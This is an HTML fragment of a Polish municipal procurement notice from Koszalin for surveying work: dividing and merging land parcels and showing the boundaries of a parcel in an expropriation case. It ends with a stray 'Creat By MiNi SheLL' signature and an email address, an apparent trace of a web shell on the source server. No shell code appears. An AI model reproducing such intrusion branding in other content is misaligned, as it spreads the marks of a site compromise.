<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dokonanie podziału nieruchomości zgodnie z liniami rozgraniczającymi tereny o różnym przeznaczeniu w miejscowym planie zagospodarowania przestrzennego Śródmieścia Koszalina oraz koncepcji zagospodarowania i podziału terenu N.AM.72331-11/10 oraz N.AM.72331-13/10. Działki ewidencyjne położone w Koszalinie przy ulicy Stefana Okrzei w obrębie nr 20 nr, nr: 331/4 pow. 0,0329 ha KW 26507;339/4 pow. 0,1435 ha KW 27310; 627/2 pow. 0,0731 ha KW 31563. Podział wyżej wymienionych działek ewidencyjnych zgodnie z liniami rozgraniczającymi tereny o różnym przeznaczeniu w miejscowym planie zagospodarowania przestrzennego oraz koncepcji zagospodarowania i podziału terenu na zapleczu budynków przy ul. Dworcowej 9-11, Okrzei 4, Zwycięstwa 7-9. Powstanie 11 działek..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.35.50.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Okazanie granic nieruchomości gruntowej będącej przedmiotem postępowania administracyjnego o zwrot wywłaszczonych nieruchomości stanowiącej własność  Gminy Miasto Koszalin oznaczonej ewidencyjnie działką ewidencyjną nr 777 o powierzchni 0,1621 ha oraz działką ewidencyjną nr 776 o powierzchni 0,0169 ha w obrębie ewidencyjnym nr 31, położonej w Koszalinie przy ulicy Zdobywców Wału Pomorskiego, w celu dokładnego określenia przebiegu granicy w szczególności poprzez budowlę wzniesioną na gruncie na granicy z działką ewidencyjną nr 190..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.35.50.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dokonanie połączenia działek ewidencyjnych nr: 
-	193/16 o powierzchni 0,0020 ha, 
-	193/24 o powierzchni 0,0439 ha,
-	193/29 o powierzchni 0,1780 ha,
-	193/33 o powierzchni 0,0391 ha,
oznaczonych ewidencyjnie w obrębie ewidencyjnym nr 20, położonych w Koszalinie przy ul. Bartosza Głowackiego i Marszałka  Józefa Piłsudskiego, ujawnionych w księdze wieczystej KW Nr KO1K/00027267/8 w Wydziale Ksiąg Wieczystych Sądu Rejonowego w Koszalinie oraz dokonanie aktualizacji użytku gruntowego nowo powstałej działki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.35.50.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com